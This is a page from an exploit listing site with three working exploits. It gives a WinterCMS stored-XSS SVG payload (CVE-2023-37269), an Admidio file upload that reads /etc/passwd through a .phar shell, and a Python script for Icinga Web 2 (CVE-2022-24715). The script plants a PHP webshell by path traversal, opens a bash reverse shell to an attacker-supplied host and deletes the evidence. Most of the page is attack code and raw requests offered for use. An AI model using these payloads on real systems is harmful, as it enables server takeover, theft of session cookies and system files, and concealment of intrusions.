Latest exploits :: CodePwn

<pre><code># Exploit Title: WinterCMS < 1.2.3 - Persistent Cross-Site Scripting # Exploit Author: abhishek morla # Google Dork: N/A # Date: 2023-07-10 # Vendor Homepage: https://wintercms.com/ # Software Link: https://github.com/wintercms/winter # Version: 1.2.2 # Tested on: windows64bit / mozila firefox # CVE : CVE-2023-37269 # Report Link : https://github.com/wintercms/winter/security/advisories/GHSA-wjw2-4j7j-6gc3 # Video POC : https://youtu.be/Dqhq8rdrcqc Title : Application is Vulnerable to Persistent Cross-Site Scripting via SVG File Upload in Custom Logo Upload Functionality Description : WinterCMS < 1.2.3 lacks restrictions on uploading SVG files as website logos, making it vulnerable to a Persistent cross-site scripting (XSS) attack. This vulnerability arises from the ability of an attacker to embed malicious JavaScript content within an SVG file, which remains visible to all users, including anonymous visitors. Consequently, any user interaction with the affected page can inadvertently trigger the execution of the malicious script Payload:- // image.svg <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.cookie); </script> </svg> //Post Request POST /backend/system/settings/update/winter/backend/branding HTTP/1.1 Host: 172.17.0.2 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache X-Requested-With: XMLHttpRequest X-CSRF-TOKEN: fk93d30vmHCawwgMlTRy97vPOxaf4iPphtUwioc2 X-WINTER-REQUEST-HANDLER: formLogo::onUpload Content-Type: multipart/form-data; boundary=---------------------------186411693022341939203410401206 Content-Length: 608 Origin: http://172.17.0.2 Connection: close Cookie: admin_auth=eyJpdiI6IkV2dElCcWdsZStzWHc5cDVIcFZ1bnc9PSIsInZhbHVlIjoiVFkyV1k3UnBKUVNhSWF2NjVNclVCdXRwNklDQlFmenZXU2hUNi91T3c5aFRTTTR3VWQrVVJkZG5pcFZTTm1IMzFtZzkyWWpRV0FYRnJuZ1VoWXQ0Q2VUTGRScHhVcVRZdWtlSGYxa1kyZTh0RXVScFdySmF1VDZyZ1p0T1pYYWI5M1ZmVWtXUkhpeXg2U0l3NG9ZWHhnPT0iLCJtYWMiOiIyNzk0OTNlOWY2ODZhYjFhMGY0M2Y4Mzk0NjViY2FiOWQ0ZjNjMThlOTkxODZjYmFmNTZkZmY3MmZhMTM3YWJlIiwidGFnIjoiIn0%3D; BBLANG=en_US; winter_session=eyJpdiI6ImJFWHVEb0QrTmo5YjZYcml6Wm1jT3c9PSIsInZhbHVlIjoiQVdVZ3R4ajVUWUZXeS83dkhIQVFhVVYxOE1uajJQOVNzOUtwM1ZGcUFYOC9haHZFMlE2R0llNjZDWVR6eHZqbDZ5Z1J1akM5VkNaQUFZM1p5OGlZcjJFWTRaT21tRWdtcnJUUHJWRWg1QTZyRFhJbEdMc0h1SzZqaEphMFFSSDYiLCJtYWMiOiI0YzRkNWQwODVkMmI4ZmMxMTJlMGU5YjM2MWJkYjNiNjEwZmE2NTY4ZGQwYTdjNjAxMjRkMjRiN2M1NTBiOTNiIiwidGFnIjoiIn0%3D -----------------------------186411693022341939203410401206 Content-Disposition: form-data; name="file_data"; filename="image.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.domain); </script> </svg> -----------------------------186411693022341939203410401206-- |-----------------------------------------EOF----------------------------------------- </code></pre>

<pre><code>Exploit Title: Admidio v4.2.10 - Remote Code Execution (RCE) Application: Admidio Version: 4.2.10 Bugs: RCE Technology: PHP Vendor URL: https://www.admidio.org/ Software Link: https://www.admidio.org/download.php Date of found: 10.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== Steps: 1. Login to account 2. Go to Announcements 3. Add Entry 4. Upload .phar file in image upload section. .phar file Content <?php echo system('cat /etc/passwd');?> 5. Visit .phar file ( http://localhost/admidio/adm_my_files/announcements/images/20230710-172217_430o3e5ma5dnuvhp.phar ) Request: POST /admidio/adm_program/system/ckeditor_upload_handler.php?CKEditor=ann_description&CKEditorFuncNum=1&langCode=en HTTP/1.1 Host: localhost Content-Length: 378 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryne9TRuC1tAqhR86r User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: iframe Referer: http://localhost/admidio/adm_program/modules/announcements/announcements_new.php?headline=Announcements Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: ADMIDIO_admidio_adm_cookieconsent_status=dismiss; ADMIDIO_admidio_adm_SESSION_ID=penqrouatvh0vmp8v2mdntrgdn; ckCsrfToken=o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB Connection: close ------WebKitFormBoundaryne9TRuC1tAqhR86r Content-Disposition: form-data; name="upload"; filename="shell.phar" Content-Type: application/octet-stream <?php echo system('cat /etc/passwd');?> ------WebKitFormBoundaryne9TRuC1tAqhR86r Content-Disposition: form-data; name="ckCsrfToken" o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB ------WebKitFormBoundaryne9TRuC1tAqhR86r-- </code></pre>

<pre><code>#!/usr/bin/env python3 # Exploit Title: Icinga Web 2.10 - Authenticated Remote Code Execution # Date: 8/07/2023 # Exploit Author: Dante Corona(Aka. cxdxnt) # Software Link: https://github.com/Icinga/icingaweb2 # Vendor Homepage: https://icinga.com/ # Software Link: https://github.com/Icinga/icingaweb2 # Version: <2.8.6, <2.9.6, <2.10 # Tested on: Icinga Web 2 Version 2.9.2 on Linux # CVE: CVE-2022-24715 # Based on: https://nvd.nist.gov/vuln/detail/CVE-2022-24715 import requests,argparse,re,random,string from colorama import Fore,Style def letter_random(): letras = string.ascii_lowercase character_random = random.choices(letras, k=6) return ''.join(character_random) def users_url_password(): parser = argparse.ArgumentParser(description='Descripción de tu programa.') parser.add_argument('-u', '--url',type=str,required=True, help='Insertar la URL http://ip_victima') parser.add_argument('-U', '--user',type=str, required=True ,help='Insertar usuario -U user') parser.add_argument('-P', '--password',type=str, required=True ,help='Insertar contraseña -P password') parser.add_argument('-i', '--ip',type=str,required=True,help='Insertar IP de atacante -i IP') parser.add_argument('-p','--port',type=str, required=True,help='Insertar puerto de atacante -p PORT') args = parser.parse_args() url = args.url user = args.user password=args.password ip_attack = args.ip port_attack = args.port return url,user,password,ip_attack,port_attack def login(url,user,password): try: login_url = url + "/icingaweb2/authentication/login" session = requests.Session() r = session.get(login_url) csrf_regex = re.findall(r'name="CSRFToken" value="([^"]*)"',r.text)[0] data_post = {"username":user, "password":password, "CSRFToken":csrf_regex, "formUID":"form_login", "btn_submit":"Login" } response = session.post(login_url,data=data_post) if "Welcome to Icinga Web!" in response.text: print(f"{Fore.GREEN}[*]{Style.RESET_ALL}Session successfully.") r = session.get(login_url) else: print("[!]Failed to login.") exit(1) #return session,csrf_regex except requests.exceptions.InvalidURL: print(f"{Fore.YELLOW}[!]{Style.RESET_ALL} Error URL :(") exit(1) return session,csrf_regex def upload_file(session,url,character_random,csrf_regex): webshell = f"""-----BEGIN RSA PRIVATE KEY----- MIIBOgIBAAJBAKj34GkxFhD90vcNLYLInFEX6Ppy1tPf9Cnzj4p4WGeKLs1Pt8Qu KUpRKfFLfRYC9AIKjbJTWit+CqvjWYzvQwECAwEAAQJAIJLixBy2qpFoS4DSmoEm o3qGy0t6z09AIJtH+5OeRV1be+N4cDYJKffGzDa88vQENZiRm0GRq6a+HPGQMd2k TQIhAKMSvzIBnni7ot/OSie2TmJLY4SwTQAevXysE2RbFDYdAiEBCUEaRQnMnbp7 9mxDXDf6AU0cN/RPBjb9qSHDcWZHGzUCIG2Es59z8ugGrDY+pxLQnwfotadxd+Uy v/Ow5T0q5gIJAiEAyS4RaI9YG8EWx/2w0T67ZUVAw8eOMB6BIUg0Xcu+3okCIBOs /5OiPgoTdSy7bcF9IGpSE8ZgGKzgYQVZeN97YE00 -----END RSA PRIVATE KEY----- <?php system($_REQUEST["%s"]);?> """%character_random upload_url = url + "/icingaweb2/config/createresource" r = session.get(upload_url) csrf = re.findall(r'name="CSRFToken" value="([^"]*)"',r.text)[0] data_post ={"type":"ssh", "name":"shm/"+character_random, "user":f"../../../../../../../../../../../dev/shm/{character_random}/run.php", "private_key":webshell, "formUID":"form_config_resource", "CSRFToken":csrf, "btn_submit":"Save Changes" } upload_response = session.post(upload_url,data=data_post) check = requests.get(url + f"/icingaweb2/lib/icinga/icinga-php-thirdparty/dev/shm/{character_random}/run.php") if check.status_code != 200 : print(f"{Fore.YELLOW}[!]{Style.RESET_ALL}Error uploading file. :(") exit(1) else: print(f"{Fore.GREEN}[*]{Style.RESET_ALL}File uploaded successfully.") def enable_module(session,url,character_random): url_module = url+"/icingaweb2/config/general" r_module = session.get(url_module) csrf_module = re.findall(r'name="CSRFToken" value="([^"]*)"',r_module.text)[0] data_post = {"global_show_stacktraces":"0", "global_show_stacktraces":"1", "global_show_application_state_messages":"0", "global_show_application_state_messages":"1", "global_module_path":"/dev/shm/", "global_config_resource":"icingaweb2", "logging_log":"none", "themes_default":"Icinga", "themes_disabled":"0", "authentication_default_domain":"", "formUID":"form_config_general", "CSRFToken":f"{csrf_module}", "btn_submit":"Save Changes" } resul = session.post(url_module,data_post) #-------------------------------------------------- url_enable = url +"/icingaweb2/config/moduleenable" r_enable = session.get(url_enable) csrf_enable = re.findall(r'name="CSRFToken" value="([^"]*)"',r_enable.text)[0] data_enable = {"identifier":f"{character_random}","CSRFToken":f"{csrf_enable}","btn_submit":"btn_submit"} resul_enable = session.post(url_enable,data_enable) def reverse_shell(session,url,ip_attack,port_attack,character_random): reverse_url = url + "/icingaweb2/dashboard" reverse_exe_one = reverse_url + f'?{character_random}=echo+"bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{ip_attack}%2F{port_attack}%200%3E%261"+>+/tmp/{character_random}' reverse_exe_two = reverse_url + f"?{character_random}=bash+/tmp/{character_random} &" reverse_response_one = session.get(reverse_exe_one) try: reverse_response_two = session.get(reverse_exe_two, timeout=5) except: print(f"{Fore.RED}[*]{Style.RESET_ALL}Eliminating evidence") remove = session.get(reverse_url + f"?{character_random}=rm+/tmp/{character_random}") disable_url = url + "/icingaweb2/config/moduledisable" r_disable = session.get(disable_url) csrf_disable = re.findall(r'name="CSRFToken" value="([^"]*)"',r_disable.text)[0] data_disable = {"identifier":f"{character_random}","CSRFToken":csrf_disable,"btn_submit":"btn_submit"} response_disable = session.post(disable_url,data=data_disable) def disable_module(session,url,character_random): url_disable = url + "/icingaweb2/config/moduledisable" if __name__ == '__main__': character_random = letter_random() url,user,password,ip_attack,port_attack = users_url_password() session,csrf_regex = login(url,user,password) upload_file(session,url,character_random,csrf_regex) enable_module(session,url,character_random) reverse_shell(session,url,ip_attack,port_attack,character_random) </code></pre>